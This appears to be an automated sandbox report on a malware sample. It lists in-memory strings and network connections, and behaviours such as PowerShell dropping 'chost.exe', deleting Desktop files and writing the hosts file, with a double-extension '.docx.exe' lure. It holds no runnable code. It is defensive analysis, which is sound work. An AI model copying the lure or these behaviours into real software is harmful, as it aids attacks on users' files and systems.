                    Source: chost.exe, 00000011.00000003.2053657547.0000016E176DD000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2373846136.0000016E178B0000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2372251589.0000016E16DBA000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2376962492.0000016E18940000.00000004.00001000.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2070118152.0000016E176E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
                    Source: chost.exe, 00000011.00000002.2376400796.0000016E1833C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
                    Source: chost.exe, 00000011.00000002.2376400796.0000016E1833C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy?
                    Source: chost.exe, 00000011.00000002.2376220344.0000016E181D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
                    Source: chost.exe, 00000011.00000002.2376962492.0000016E18984000.00000004.00001000.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2376962492.0000016E18940000.00000004.00001000.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2376962492.0000016E189A4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://weibo.com/
                    Source: chost.exe, 00000011.00000002.2376962492.0000016E18940000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.aliexpress.com/
                    Source: chost.exe, 00000011.00000002.2376962492.0000016E18940000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.ca/
                    Source: chost.exe, 00000011.00000002.2376962492.0000016E18940000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.co.uk/
                    Source: chost.exe, 00000011.00000002.2376962492.0000016E18940000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/
                    Source: chost.exe, 00000011.00000002.2376637980.0000016E184EC000.00000004.00001000.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2376962492.0000016E18940000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.de/
                    Source: chost.exe, 00000011.00000002.2376962492.0000016E18940000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.fr/
                    Source: chost.exe, 00000011.00000002.2376400796.0000016E1833C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.avito.ru/
                    Source: chost.exe, 00000011.00000002.2376962492.0000016E18940000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.baidu.com/
                    Source: chost.exe, 00000011.00000002.2376962492.0000016E18940000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.bbc.co.uk/
                    Source: chost.exe, 00000011.00000002.2376962492.0000016E18940000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ctrip.com/
                    Source: chost.exe, 00000011.00000002.2376962492.0000016E18940000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ebay.co.uk/
                    Source: chost.exe, 00000011.00000002.2376962492.0000016E18940000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ebay.de/
                    Source: chost.exe, 00000011.00000003.2369122552.0000016E179C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: chost.exe, 00000011.00000002.2376962492.0000016E18984000.00000004.00001000.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2376962492.0000016E18940000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
                    Source: chost.exe, 00000011.00000003.2369122552.0000016E179C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: chost.exe, 00000011.00000002.2376962492.0000016E18940000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ifeng.com/
                    Source: chost.exe, 00000011.00000002.2376962492.0000016E18940000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.iqiyi.com/
                    Source: chost.exe, 00000011.00000002.2376962492.0000016E18940000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.leboncoin.fr/
                    Source: chost.exe, 00000011.00000003.2198748954.0000016E177B2000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2210509318.0000016E1774E000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2216947461.0000016E177B2000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2216947461.0000016E1774E000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2213105581.0000016E177B2000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2376962492.0000016E18984000.00000004.00001000.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2376637980.0000016E18448000.00000004.00001000.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2201304852.0000016E1774E000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2207707806.0000016E177B2000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2213135289.0000016E1774E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                    Source: chost.exe, 00000011.00000003.2370358863.0000016E1731D000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2372629701.0000016E1731D000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2176244203.0000016E177B6000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2202547693.0000016E1772C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
                    Source: chost.exe, 00000011.00000003.2198748954.0000016E17761000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2216947461.0000016E17761000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                    Source: chost.exe, 00000011.00000003.2176244203.0000016E177B6000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2176244203.0000016E1772C000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2202547693.0000016E1772C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                    Source: chost.exe, 00000011.00000003.2198748954.0000016E17761000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2216947461.0000016E17761000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                    Source: chost.exe, 00000011.00000003.2176244203.0000016E177B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                    Source: chost.exe, 00000011.00000003.2198748954.0000016E17761000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2216947461.0000016E17761000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                    Source: chost.exe, 00000011.00000003.2198748954.0000016E17761000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2216947461.0000016E17761000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2176244203.0000016E177B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                    Source: chost.exe, 00000011.00000003.2370070368.0000016E17586000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2247819963.0000016E17585000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2373846136.0000016E17900000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2176244203.0000016E1774F000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2373248659.0000016E17589000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2245289338.0000016E17583000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon.d25d81d39065.icox
                    Source: chost.exe, 00000011.00000003.2198748954.0000016E17761000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2216947461.0000016E17761000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                    Source: chost.exe, 00000011.00000002.2376962492.0000016E189EC000.00000004.00001000.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2374587736.0000016E17C5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com
                    Source: chost.exe, 00000011.00000002.2376962492.0000016E18984000.00000004.00001000.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2376962492.0000016E18940000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.olx.pl/
                    Source: chost.exe, 00000010.00000003.2022156527.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2379155081.00007FFDF6B09000.00000004.00000001.01000000.0000001B.sdmp, chost.exe, 00000011.00000002.2382640671.00007FFDF701A000.00000004.00000001.01000000.0000001A.sdmp, libssl-3.dll.16.drString found in binary or memory: https://www.openssl.org/H
                    Source: chost.exe, 00000011.00000002.2383172319.00007FFDF7956000.00000040.00000001.01000000.0000000F.sdmpString found in binary or memory: https://www.python.org/psf/license/
                    Source: chost.exe, 00000011.00000002.2383172319.00007FFDF7852000.00000040.00000001.01000000.0000000F.sdmpString found in binary or memory: https://www.python.org/psf/license/)
                    Source: chost.exe, 00000011.00000002.2376962492.0000016E18940000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.reddit.com/
                    Source: chost.exe, 00000011.00000003.2370070368.0000016E17586000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2247819963.0000016E17585000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2373248659.0000016E17589000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2053657547.0000016E1758D000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2245289338.0000016E17583000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
                    Source: chost.exe, 00000011.00000002.2376400796.0000016E1833C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.wykop.pl/
                    Source: chost.exe, 00000011.00000002.2376962492.0000016E18940000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                    Source: chost.exe, 00000011.00000002.2376962492.0000016E18984000.00000004.00001000.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2376962492.0000016E189A4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.zhihu.com/
                    Source: chost.exe, 00000011.00000003.2053657547.0000016E176DD000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2370070368.0000016E17586000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2373846136.0000016E178B0000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2247819963.0000016E17585000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2373248659.0000016E17589000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2053657547.0000016E1758D000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2245289338.0000016E17583000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com/
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                    Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49730 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.4:49731 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49732 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.4:49733 version: TLS 1.2
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASS

                    Spam, unwanted Advertisements and Ransom Demands

                    barindex
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile deleted: C:\Users\user\AppData\Local\Temp\? ? \Common Files\Desktop\YPSIACHYXW.pngJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile deleted: C:\Users\user\AppData\Local\Temp\? ? \Common Files\Desktop\VLZDGUKUTZ.docxJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile deleted: C:\Users\user\AppData\Local\Temp\? ? \Common Files\Desktop\DVWHKMNFNN.pdfJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile deleted: C:\Users\user\AppData\Local\Temp\? ? \Common Files\Desktop\DVWHKMNFNN.mp3Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile deleted: C:\Users\user\AppData\Local\Temp\? ? \Common Files\Desktop\JSDNGYCOWY.mp3Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: cmd.exeProcess created: 66

                    System Summary

                    barindex
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\chost.exeJump to dropped file
                    Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                    Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                    Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                    Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                    Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                    Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                    Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                    Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                    Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                    Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                    Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                    Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                    Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                    Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exeCode function: 0_2_0040C8980_2_0040C898
                    Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exeCode function: 0_2_0040E9500_2_0040E950
                    Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exeCode function: 0_2_004109100_2_00410910
                    Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exeCode function: 0_2_004109D90_2_004109D9
                    Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exeCode function: 0_2_004105E00_2_004105E0
                    Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exeCode function: 0_2_004115800_2_00411580
                    Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exeCode function: 0_2_004109930_2_00410993
                    Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exeCode function: 0_2_004106000_2_00410600
                    Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exeCode function: 0_2_0040B3470_2_0040B347
                    Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exeCode function: 0_2_0040F3C80_2_0040F3C8
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 16_2_00007FF69436100016_2_00007FF694361000
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 16_2_00007FF69438093816_2_00007FF694380938
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 16_2_00007FF6943869D416_2_00007FF6943869D4
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 16_2_00007FF694368BD016_2_00007FF694368BD0
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 16_2_00007FF694375DA016_2_00007FF694375DA0
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 16_2_00007FF69437361016_2_00007FF694373610
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 16_2_00007FF694371DC416_2_00007FF694371DC4
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 16_2_00007FF69437E5E016_2_00007FF69437E5E0
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 16_2_00007FF694379F1016_2_00007FF694379F10
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 16_2_00007FF694385EEC16_2_00007FF694385EEC
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 16_2_00007FF69438979816_2_00007FF694389798
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 16_2_00007FF6943717B016_2_00007FF6943717B0
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 16_2_00007FF69437DF6016_2_00007FF69437DF60
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 16_2_00007FF69437880416_2_00007FF694378804
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 16_2_00007FF694371FD016_2_00007FF694371FD0
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 16_2_00007FF69436987016_2_00007FF694369870
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 16_2_00007FF69438411C16_2_00007FF69438411C
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 16_2_00007FF6943818E416_2_00007FF6943818E4
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 16_2_00007FF6943719B416_2_00007FF6943719B4
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 16_2_00007FF69437815416_2_00007FF694378154
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 16_2_00007FF694373A1416_2_00007FF694373A14
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 16_2_00007FF6943721D416_2_00007FF6943721D4
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 16_2_00007FF69437DACC16_2_00007FF69437DACC
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 16_2_00007FF69436A34B16_2_00007FF69436A34B
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 16_2_00007FF694371BC016_2_00007FF694371BC0
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 16_2_00007FF694372C8016_2_00007FF694372C80
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 16_2_00007FF694383C8016_2_00007FF694383C80
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 16_2_00007FF69438648816_2_00007FF694386488
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 16_2_00007FF69438093816_2_00007FF694380938
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 16_2_00007FF694385C7016_2_00007FF694385C70
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 16_2_00007FF69436AD1D16_2_00007FF69436AD1D
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 16_2_00007FF69436A4E416_2_00007FF69436A4E4
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FF69436100017_2_00007FF694361000
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FF6943869D417_2_00007FF6943869D4
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FF694385C7017_2_00007FF694385C70
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FF694375DA017_2_00007FF694375DA0
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FF69437361017_2_00007FF694373610
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FF694371DC417_2_00007FF694371DC4
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FF69437E5E017_2_00007FF69437E5E0
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FF694379F1017_2_00007FF694379F10
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FF694385EEC17_2_00007FF694385EEC
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FF69438979817_2_00007FF694389798
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FF6943717B017_2_00007FF6943717B0
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FF69437DF6017_2_00007FF69437DF60
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FF69437880417_2_00007FF694378804
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FF694371FD017_2_00007FF694371FD0
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FF69436987017_2_00007FF694369870
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FF69438411C17_2_00007FF69438411C
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FF6943818E417_2_00007FF6943818E4
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FF6943719B417_2_00007FF6943719B4
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FF69438093817_2_00007FF694380938
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FF69437815417_2_00007FF694378154
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FF694373A1417_2_00007FF694373A14
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FF6943721D417_2_00007FF6943721D4
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FF69437DACC17_2_00007FF69437DACC
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FF69436A34B17_2_00007FF69436A34B
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FF694371BC017_2_00007FF694371BC0
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FF694368BD017_2_00007FF694368BD0
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FF694372C8017_2_00007FF694372C80
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FF694383C8017_2_00007FF694383C80
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FF69438648817_2_00007FF694386488
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FF69438093817_2_00007FF694380938
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FF69436AD1D17_2_00007FF69436AD1D
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FF69436A4E417_2_00007FF69436A4E4
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDEAE412F017_2_00007FFDEAE412F0
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDEAE4188017_2_00007FFDEAE41880
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDF6A85C0017_2_00007FFDF6A85C00
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDF6A41C1217_2_00007FFDF6A41C12
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDF6AB365017_2_00007FFDF6AB3650
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDF6A417F817_2_00007FFDF6A417F8
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDF6AAD2D017_2_00007FFDF6AAD2D0
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDF6A4270217_2_00007FFDF6A42702
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDF6A424DC17_2_00007FFDF6A424DC
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDF6A4154617_2_00007FFDF6A41546
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDF6A41AD717_2_00007FFDF6A41AD7
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDF6A6603017_2_00007FFDF6A66030
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDF6A41FDC17_2_00007FFDF6A41FDC
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDF6A8DE5017_2_00007FFDF6A8DE50
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDF6A421E417_2_00007FFDF6A421E4
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDF6A6BAE017_2_00007FFDF6A6BAE0
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDF6A89A6017_2_00007FFDF6A89A60
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDF6A4155A17_2_00007FFDF6A4155A
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDF6A4165417_2_00007FFDF6A41654
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDF6A421C617_2_00007FFDF6A421C6
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDF6A413DE17_2_00007FFDF6A413DE
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDF6A4159617_2_00007FFDF6A41596
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDF6B07A2017_2_00007FFDF6B07A20
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDF6A8D98017_2_00007FFDF6A8D980
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDF6A4872017_2_00007FFDF6A48720
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDF6A4116D17_2_00007FFDF6A4116D
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDF6A416FE17_2_00007FFDF6A416FE
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDF6A41D9317_2_00007FFDF6A41D93
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDF6A4117C17_2_00007FFDF6A4117C
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDF6A4149C17_2_00007FFDF6A4149C
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDF6A41CBC17_2_00007FFDF6A41CBC
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDF6ABAC8017_2_00007FFDF6ABAC80
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDF6A41B5417_2_00007FFDF6A41B54
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDF6A41A0F17_2_00007FFDF6A41A0F
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDF6A4261717_2_00007FFDF6A42617
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDF6A41EE217_2_00007FFDF6A41EE2
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDF6A7892017_2_00007FFDF6A78920
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDF6AB887017_2_00007FFDF6AB8870
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDF6A4161817_2_00007FFDF6A41618
